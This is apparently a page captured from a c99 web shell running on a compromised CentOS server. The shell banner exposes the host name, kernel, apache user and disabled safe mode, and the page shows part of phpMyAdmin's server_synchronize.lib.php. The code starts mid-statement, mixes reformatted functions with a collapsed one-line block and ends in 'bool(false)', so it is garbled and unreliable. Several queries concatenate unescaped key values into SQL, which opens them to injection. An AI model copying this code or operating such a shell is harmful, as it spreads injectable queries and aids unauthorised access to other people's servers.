!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 52.3 GB of 127.8 GB (40.92%)


Viewing file:     server_synchronize.lib.php (78.84 KB)      -rw-r--r--
 1){
                    for ($k=0; $k < sizeof($is_key); $k++) {
                        $trg_select_query .= $is_key[$k] . "='" . $source_result_set[$j][$is_key[$k]] . "'";
                        if ($k < (sizeof($is_key)-1)){
                            $trg_select_query .= " AND ";    
                        }
                    }  
                }
        
                $target_result_set = PMA_DBI_fetch_result($trg_select_query, null, null, $trg_link);
				if ($target_result_set) {

					// Fetch the row from the source server to do a comparison
                    $src_select_query = "SELECT * FROM " . PMA_backquote($src_db) . "." 
                 	   . PMA_backquote($matching_table[$matching_table_index]) . " WHERE ";
                    
                    if (sizeof($is_key) == 1) {
                        $src_select_query .= $is_key[0] . "='" . $source_result_set[$j] . "'";
                    } else if(sizeof($is_key) > 1){
                        for ($k=0; $k< sizeof($is_key); $k++) {
                            $src_select_query .= $is_key[$k] . "='" . $source_result_set[$j][$is_key[$k]] . "'";
                            if ($k < (sizeof($is_key) - 1)){
                                $src_select_query .= " AND ";    
                            }
                        }
                    }  
                    
                    $src_result_set = PMA_DBI_fetch_result($src_select_query, null, null, $src_link);
                    
                    /**
                    * Comparing each corresponding field of the source and target matching rows.
                    * Placing the primary key, value of primary key, field to be updated, and the 
                    * new value of field to be updated in each row of the update array. 
                    */
                    for ($m = 0; ($m < $fields_num[$matching_table_index]) && ($starting_index == 0) ; $m++) {
                        if (isset($src_result_set[0][$fld[$m]])) {
                          if (isset($target_result_set[0][$fld[$m]])) {
                            if (($src_result_set[0][$fld[$m]] != $target_result_set[0][$fld[$m]]) && (! (in_array($fld[$m], $is_key)))) {
                                if (sizeof($is_key) == 1) {
                                    if ($source_result_set[$j]) {
                                        $update_array[$matching_table_index][$update_row][$is_key[0]] = $source_result_set[$j];
                                    }
                                } elseif (sizeof($is_key) > 1) {  
                                    for ($n=0; $n < sizeof($is_key); $n++) {
                                        if (isset($src_result_set[0][$is_key[$n]])) {
                                            $update_array[$matching_table_index][$update_row][$is_key[$n]] = $src_result_set[0][$is_key[$n]];
                                        }
                                    }
                                }
                                        
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                
                                $update_field++;
                                if (isset($src_result_set[0][$fld[$m]])) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]]; 
                                    $update_field++;
                                }
                                $starting_index = $m;
                                $update_row++;
                            }
                        } else {
                               if (sizeof($is_key) == 1) {
                                    if ($source_result_set[$j]) {
                                        $update_array[$matching_table_index][$update_row][$is_key[0]] = $source_result_set[$j];
                                
                                    }
                                } elseif (sizeof($is_key) > 1) {  
                                    for ($n = 0; $n < sizeof($is_key); $n++) {
                                        if (isset($src_result_set[0][$is_key[$n]])) {
                                            $update_array[$matching_table_index][$update_row][$is_key[$n]] = $src_result_set[0][$is_key[$n]];
                                        }
                                    }
                                }
                                        
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                
                                $update_field++;
                                if (isset($src_result_set[0][$fld[$m]])) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]]; 
                                    $update_field++;
                                }
                                $starting_index = $m;
                                $update_row++;
                        }
                      }
                    }
                    for ($m = $starting_index + 1; $m < $fields_num[$matching_table_index] ; $m++)
                    {   
                        if (isset($src_result_set[0][$fld[$m]])) {
                            if (isset($target_result_set[0][$fld[$m]])) { 
                                if (($src_result_set[0][$fld[$m]] != $target_result_set[0][$fld[$m]]) && (!(in_array($fld[$m], $is_key)))) {
                                $update_row--; 
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                $update_field++;
                                if ($src_result_set[0][$fld[$m]]) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]];
                                    $update_field++;
                                }
                                $update_row++; 
                            }
                        } else {
                               $update_row--; 
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                $update_field++;
                                if ($src_result_set[0][$fld[$m]]) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]];
                                    $update_field++;
                                }
                                $update_row++; 
                            }
                        }
                    }
				} else {
					/**
					 * Placing the primary key, and the value of primary key of the row that is to be inserted in the target table
					 */
                    if (sizeof($is_key) == 1) {
                        if (isset($source_result_set[$j])) {
                            $insert_array[$matching_table_index][$insert_row][$is_key[0]] = $source_result_set[$j];
                        }
                    } elseif (sizeof($is_key) > 1) {  
                        for($l = 0; $l < sizeof($is_key); $l++) {
                            if (isset($source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]])) {
                                $insert_array[$matching_table_index][$insert_row][$is_key[$l]] = $source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]];
                            }
                        }
                    }
                    $insert_row++;
                }
            } else {
                    /**
                    * Placing the primary key, and the value of primary key of the row that is to be inserted in the target table
                    * This condition is met when there is an additional column in the source table                                                  
                    */
                    if (sizeof($is_key) == 1) {
                        if (isset($source_result_set[$j])) {
                            $insert_array[$matching_table_index][$insert_row][$is_key[0]] = $source_result_set[$j];
                        }
                    } elseif (sizeof($is_key) > 1) {  
                        for ($l = 0; $l < sizeof($is_key); $l++) {
                            if (isset($source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]])) {
                                $insert_array[$matching_table_index][$insert_row][$is_key[$l]] = $source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]];
                            }
                        }
                    }
                $insert_row++;
            }
        } // for loop ends
    }    
} 
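/**
* PMA_findDeleteRowsFromTargetTables finds the rows which are to be deleted from target table.
*
* Key values that exist in the target table but not in the source table are
* written to $delete_array[$matching_table_index]. When the key columns of the
* two tables differ, every target key value is written there instead.
*
* @uses   sizeof()
* @uses   is_array()
* @uses   PMA_DBI_get_column_values()
* @uses   in_array()
* 
* @param  $delete_array          array containing rows that are to be deleted (filled by reference)
* @param  $matching_table        array containing matching table names
* @param  $matching_table_index  index of a table from $matching_table array
* @param  $trg_keys              array of target table keys
* @param  $src_keys              array of source table keys
* @param  $trg_db                name of target database
* @param  $trg_link              connection established with target server
* @param  $src_db                name of source database 
* @param  $src_link              connection established with source server
* 
*/
function PMA_findDeleteRowsFromTargetTables(&$delete_array, $matching_table, $matching_table_index, $trg_keys, $src_keys, $trg_db, $trg_link,$src_db, $src_link)
{
    // Without key columns for the target table no row can be identified,
    // so there is nothing to queue (and nothing to count or iterate below).
    if (! isset($trg_keys[$matching_table_index])) {
        return;
    }

    $target_keys = $trg_keys[$matching_table_index];
    $source_keys = isset($src_keys[$matching_table_index]) ? $src_keys[$matching_table_index] : array();
    $table_name  = $matching_table[$matching_table_index];

    $target_key_values = PMA_DBI_get_column_values($trg_db, $table_name, $target_keys, $trg_link);

    // Always defined, so the membership tests below never see an undefined variable
    $source_key_values = array();
    if (isset($src_keys[$matching_table_index])) {
        $source_key_values = PMA_DBI_get_column_values($src_db, $table_name, $source_keys, $src_link);
    }

    // NOTE(review): the return value of PMA_DBI_get_column_values() on failure is
    // not visible here - anything that is not an array is treated as "no values".
    if (! is_array($target_key_values)) {
        return;
    }
    if (! is_array($source_key_values)) {
        // NOTE(review): an empty or failed source read makes every target row look
        // orphaned, so all of them are queued for deletion below. Callers should
        // confirm the source read succeeded before executing the deletes.
        $source_key_values = array();
    }

    $key_count = sizeof($target_keys);

    // Every target key column must also be a key column of the source table
    $all_keys_match = true;
    for ($a = 0; $a < $key_count; $a++) {
        if (isset($target_keys[$a]) && ! in_array($target_keys[$a], $source_keys)) {
            $all_keys_match = false;
            break;
        }
    }

    if (! $all_keys_match) {
        // Key definitions differ: rows cannot be paired up, so all target key
        // values are handed back as deletion candidates.
        $delete_array[$matching_table_index] = $target_key_values;
        return;
    }

    $row = 0;
    $target_total = sizeof($target_key_values);

    if ($key_count == 1) {
        // Single key column: the values are scalars, a membership test is enough
        for ($i = 0; $i < $target_total; $i++) {
            if (! in_array($target_key_values[$i], $source_key_values)) {
                $delete_array[$matching_table_index][$row] = $target_key_values[$i];
                $row++;
            }
        }
    } elseif ($key_count > 1) {
        // Composite key: a target row survives only if some source row agrees
        // with it on every key column
        $source_total = sizeof($source_key_values);
        for ($i = 0; $i < $target_total; $i++) {
            $is_present = false;
            for ($j = 0; $j < $source_total && ! $is_present; $j++) {
                $check = true;
                for ($k = 0; $k < $key_count; $k++) {
                    if ($target_key_values[$i][$target_keys[$k]] != $source_key_values[$j][$target_keys[$k]]) {
                        $check = false;
                        break;
                    }
                }
                if ($check) {
                    $is_present = true;
                }
            }
            if (! $is_present) {
                for ($l = 0; $l < $key_count; $l++) {
                    $delete_array[$matching_table_index][$row][$target_keys[$l]] = $target_key_values[$i][$target_keys[$l]];
                }
                $row++;
            }
        }
    }
}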

/**
* PMA_dataDiffInUncommonTables() counts the rows of one table that exists only
* in the source database and stores the result in $row_count[$index].
*
* @uses   PMA_DBI_fetch_result()
* @uses   PMA_backquote()
* 
* @param  $source_tables_uncommon  array of table names; containing table names that are in source db and not in target db
* @param  $src_db                  name of source database
* @param  $src_link                connection established with source server
* @param  $index                   position of the table inside $source_tables_uncommon
* @param  $row_count               array receiving the count at position $index (by reference)
*/
function PMA_dataDiffInUncommonTables($source_tables_uncommon, $src_db, $src_link, $index, &$row_count)
{
    // Database and table name are both backquoted before they reach the query text
    $qualified_table = PMA_backquote($src_db) . "." . PMA_backquote($source_tables_uncommon[$index]);
    $count_result    = PMA_DBI_fetch_result("SELECT COUNT(*) FROM " . $qualified_table, null, null, $src_link);

    // First element of the result is stored as the row count of this table
    $row_count[$index] = $count_result[0];
}

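/**
* PMA_updateTargetTables() sets the updated field values to target table rows using $update_array[$matching_table_index]
*
* Each entry of $update_array[$matching_table_index] holds the key columns of
* one row (key name => value) followed by numerically indexed pairs of
* field name and new value. One UPDATE statement is issued per entry.
*
* @uses    PMA_DBI_try_query()
* @uses    PMA_backquote()
* @uses    PMA_sqlAddslashes()
* @uses    htmlspecialchars()
*  
* @param    $table                 Array containing matching tables' names 
* @param    $update_array          A three dimensional array containing field
*                                  value updates required for each matching table
* @param    $src_db                Name of source database (not used by this function)
* @param    $trg_db                Name of target database
* @param    $trg_link              Connection established with target server
* @param    $matching_table_index  index of matching table in matching_table_array    
* @param    $matching_table_keys   array of key column names, one list per matching table
* @param    $display               true/false value; when true each query is echoed before it runs
*/
function PMA_updateTargetTables($table, $update_array, $src_db, $trg_db, $trg_link, $matching_table_index, $matching_table_keys, $display)
{
    if (! isset($update_array[$matching_table_index]) || ! sizeof($update_array[$matching_table_index])) {
        return;
    }

    $key_names = isset($matching_table_keys[$matching_table_index]) ? $matching_table_keys[$matching_table_index] : array();
    $key_count = sizeof($key_names);
    $row_total = sizeof($update_array[$matching_table_index]);

    for ($update_row = 0; $update_row < $row_total; $update_row++) {
        if (! isset($update_array[$matching_table_index][$update_row])) {
            continue;
        }
        $row = $update_array[$matching_table_index][$update_row];

        // Entries that are not key columns are the field/value pairs
        $update_fields_num = sizeof($row) - $key_count;
        if ($update_fields_num <= 0) {
            continue;
        }

        // The values are row data copied from the source server. They are escaped
        // and the column names backquoted, so a quote or backtick inside the data
        // cannot change the structure of the statement run on the target server.
        $assignments = array();
        for ($update_field = 0; $update_field < $update_fields_num; $update_field += 2) {
            if (isset($row[$update_field]) && isset($row[$update_field + 1])) {
                $assignments[] = PMA_backquote($row[$update_field]) . "='" . PMA_sqlAddslashes($row[$update_field + 1]) . "'";
            }
        }

        // The WHERE clause must name every key column. A row with a missing key
        // value is skipped instead of being matched by a broader condition.
        $conditions    = array();
        $keys_complete = true;
        for ($key = 0; $key < $key_count; $key++) {
            if (! isset($key_names[$key])) {
                continue;
            }
            if (! isset($row[$key_names[$key]])) {
                $keys_complete = false;
                break;
            }
            $conditions[] = PMA_backquote($key_names[$key]) . "='" . PMA_sqlAddslashes($row[$key_names[$key]]) . "'";
        }

        // Joining the collected parts avoids the dangling ", " or " AND " that
        // appeared when a pair was skipped, and never sends an UPDATE without WHERE.
        if (! $keys_complete || empty($assignments) || empty($conditions)) {
            continue;
        }

        $query = "UPDATE " . PMA_backquote($trg_db) . "." . PMA_backquote($table[$matching_table_index]) . " SET "
            . implode(", ", $assignments)
            . " WHERE "
            . implode(" AND ", $conditions);

        if ($display == true) {
            // NOTE(review): presumably printed into an HTML page - the query contains
            // row data, so it is escaped for output. Confirm the output context.
            echo "\n\n" . htmlspecialchars($query) . "\n\n";
        }
        PMA_DBI_try_query($query, $trg_link, 0);
    }
}
/** * PMA_insertIntoTargetTable() inserts missing rows in the target table using $array_insert[$matching_table_index] * * @uses PMA_DBI_fetch_result() * @uses PMA_backquote() * * * @param $matching_table array containing matching table names * @param $src_db name of source database * @param $trg_db name of target database * @param $src_link connection established with source server * @param $trg_link connection established with target server * @param $table_fields array containing field names of a table * @param $array_insert * @param $matching_table_index index of matching table in matching_table_array * @param $matching_tables_keys array containing field names that are keys in the matching table * @param $source_columns array containing source column information * @param $add_column_array array containing column names that are to be added in target table * @param $criteria array containing criterias like type, null, collation, default etc * @param $target_tables_keys array containing field names that are keys in the target table * @param $uncommon_tables array containing table names that are present in source db but not in targt db * @param $uncommon_tables_fields array containing field names of the uncommon tables * @param $uncommon_cols column names that are present in target table and not in source table * @param $alter_str_array array containing column names that are to be altered * @param $source_indexes column names on which indexes are made in source table * @param $target_indexes column names on which indexes are made in target table * @param $add_indexes_array array containing column names on which index is to be added in target table * @param $alter_indexes_array array containing column names whose indexes are to be altered. 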
Only index name and uniqueness of an index can be changed * @param $delete_array array containing rows that are to be deleted * @param $update_array array containing rows that are to be updated in target * @param $display true/false value * */ function PMA_insertIntoTargetTable($matching_table, $src_db, $trg_db, $src_link, $trg_link, $table_fields, &$array_insert, $matching_table_index, $matching_tables_keys, $source_columns, &$add_column_array, $criteria, $target_tables_keys, $uncommon_tables, &$uncommon_tables_fields,$uncommon_cols, &$alter_str_array,&$source_indexes, &$target_indexes, &$add_indexes_array, &$alter_indexes_array, &$delete_array, &$update_array, $display) { if(isset($array_insert[$matching_table_index])) { if (sizeof($array_insert[$matching_table_index])) { for ($insert_row = 0; $insert_row< sizeof($array_insert[$matching_table_index]); $insert_row++) { if (isset($array_insert[$matching_table_index][$insert_row][$matching_tables_keys[$matching_table_index][0]])) { $select_query = "SELECT * FROM " . PMA_backquote($src_db) . "." . PMA_backquote($matching_table[$matching_table_index]) . " WHERE "; for ($i = 0; $i < sizeof($matching_tables_keys[$matching_table_index]); $i++) { $select_query .= $matching_tables_keys[$matching_table_index][$i] . "='"; $select_query .= $array_insert[$matching_table_index][$insert_row][$matching_tables_keys[$matching_table_index][$i]] . "'" ; if ($i < (sizeof($matching_tables_keys[$matching_table_index]) - 1)) { $select_query.= " AND "; } } $select_query .= "; "; $result = PMA_DBI_fetch_result ($select_query, null, null, $src_link); $insert_query = "INSERT INTO " . PMA_backquote($trg_db) . "." . PMA_backquote($matching_table[$matching_table_index]) ." ("; for ($field_index = 0; $field_index < sizeof($table_fields[$matching_table_index]); $field_index++) { $insert_query .= $table_fields[$matching_table_index][$field_index]; $is_fk_query = "SELECT * FROM information_schema.KEY_COLUMN_USAGE WHERE TABLE_SCHEMA = '" . 
$trg_db ."' AND TABLE_NAME = '" . $matching_table[$matching_table_index]. "'AND COLUMN_NAME = '" . $table_fields[$matching_table_index][$field_index] . "' AND TABLE_NAME <> REFERENCED_TABLE_NAME;" ; $is_fk_result = PMA_DBI_fetch_result($is_fk_query, null, null, $trg_link); if (sizeof($is_fk_result) > 0) { for ($j = 0; $j < sizeof($is_fk_result); $j++) { $table_index = array_keys($matching_table, $is_fk_result[$j]['REFERENCED_TABLE_NAME']); if (isset($alter_str_array[$table_index[0]])) { PMA_alterTargetTableStructure($trg_db, $trg_link, $matching_tables, $source_columns, $alter_str_array, $matching_tables_fields, $criteria, $matching_tables_keys, $target_tables_keys, $table_index[0], $display); unset($alter_str_array[$table_index[0]]); } if (isset($uncommon_columns[$table_index[0]])) { PMA_removeColumnsFromTargetTable($trg_db, $trg_link, $matching_tables, $uncommon_columns, $table_index[0], $display); unset($uncommon_columns[$table_index[0]]); } if (isset($add_column_array[$table_index[0]])) { PMA_findDeleteRowsFromTargetTables($delete_array, $matching_tables, $table_index[0], $target_tables_keys, $matching_tables_keys, $trg_db, $trg_link, $src_db, $src_link); if (isset($delete_array[$table_index[0]])) { PMA_deleteFromTargetTable($trg_db, $trg_link, $matching_tables, $table_index[0], $target_tables_keys, $delete_array, $display); unset($delete_array[$table_index[0]]); } PMA_addColumnsInTargetTable($src_db, $trg_db, $src_link, $trg_link, $matching_tables, $source_columns, $add_column_array, $matching_tables_fields, $criteria, $matching_tables_keys, $target_tables_keys, $uncommon_tables,$uncommon_tables_fields, $table_index[0], $uncommon_cols, $display); unset($add_column_array[$table_index[0]]); } if (isset($add_indexes_array[$table_index[0]])
bool(false)


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--